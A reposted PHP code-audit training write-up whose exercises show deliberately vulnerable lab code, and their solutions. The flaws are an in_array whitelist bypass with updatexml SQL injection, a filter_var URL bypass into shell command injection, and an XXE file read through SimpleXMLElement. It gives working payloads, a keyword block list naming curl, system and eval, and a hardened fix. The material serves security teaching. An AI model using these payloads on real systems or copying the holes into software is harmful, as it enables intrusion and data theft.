PHP Code Audit Day 1-4 Exercises

Source: 先知社区 (Xianzhi community), 红日安全

Day1 in_array function flaw

Link

//1.php
<?php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>";
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>
//config.php
<?php  
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
?>

Solution

  • in_array() bypass: the check is done without strict comparison, so it can be bypassed
  • stop_hack() filters the common string-concatenation functions, but injection through updatexml() still works

payload

?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))
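Why the whitelist check above lets the payload through, and what a hardened version of the stop_hack()/in_array()/query() sequence looks like. This is an added example, not code from the original exercise; it assumes $conn is the mysqli connection from config.php and that mysqlnd is available for get_result(). The loose-comparison behaviour shown is PHP 7's; PHP 8 changed the string-to-int comparison rules, but the unescaped interpolation into the SQL string remains.

```php
<?php
// Added example, not part of the original exercise: why the Day1 whitelist
// check fails and a hardened replacement for the stop_hack()/in_array()/
// query() sequence in 1.php. Assumes $conn is the mysqli connection from
// config.php and that mysqlnd is available for get_result().

// Constructed stand-in for the page's range(1, COUNT(*)) whitelist.
$whitelist = range(1, 10);

// Without the third argument in_array() uses loose (==) comparison. On
// PHP 7 a leading-numeric string equals the integer it starts with, so
// "4 and 1=1" == 4 holds and the payload passes the whitelist. (PHP 8's
// saner comparison rules reject it, but the id is still interpolated into
// the SQL string unescaped, so binding is required either way.)
var_dump(in_array("4 and 1=1", $whitelist));
var_dump(in_array("4 and 1=1", $whitelist, true));

// Hardened validation: accept only a canonical integer, then compare it
// strictly (same type and value) against the whitelist.
function validate_id($raw, array $whitelist): ?int
{
    // FILTER_VALIDATE_INT returns false for "4 and 1=1", "4.0", "0x4", "".
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    return in_array($id, $whitelist, true) ? $id : null;
}

// Even a validated id is never interpolated into the query: bind it.
function fetch_user(mysqli $conn, int $id): ?array
{
    $stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$id = validate_id($_GET['id'] ?? '', $whitelist);
if ($id === null) {
    die("id is not in whitelist.");   // do not echo the raw input back
}
$row = fetch_user($conn, $id);
```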

Day2 - filter_var function flaw

<?php 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>

Solution

  • Bypass filter_var() with FILTER_VALIDATE_URL, for example:
?url=demo://demo.com:80;sec-redclub.com:80/
?url=http://demo.com%23sec-redclub.com

payload

?url=demo://%22;ls;%22sec-redclub.com:80/

%22 is a double quote ("), which closes the quote around the host in the exec() call in the source, so what the system shell actually executes is:

curl "";ls;"sec-redclub.com"

?url=demo://%22;cat<flag.php;%22sec-redclub.com:80/

cat flag.php contains a space, and a space does not get past filter_var(), so cat<flag.php is used instead.

Day3 arbitrary object instantiation vulnerability

<?php
class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>';
}

Solution

  • Directly use one of PHP's built-in classes: the GlobIterator class searches for files.

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

The first parameter is the filename pattern to search for.

payload1

?name=GlobIterator&param=./*.php

  • Use SimpleXMLElement to read the file contents (XXE through an external entity; param2=2 is LIBXML_NOENT, which makes SimpleXMLElement substitute the entity):
?name=SimpleXMLElement
&param=<?xml version="1.0"?><!DOCTYPE ANY 
[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/day/flag.php">]>
<x>%26xxe;</x>&param2=2


Reposted from blog.csdn.net/qq_41725312/article/details/83314548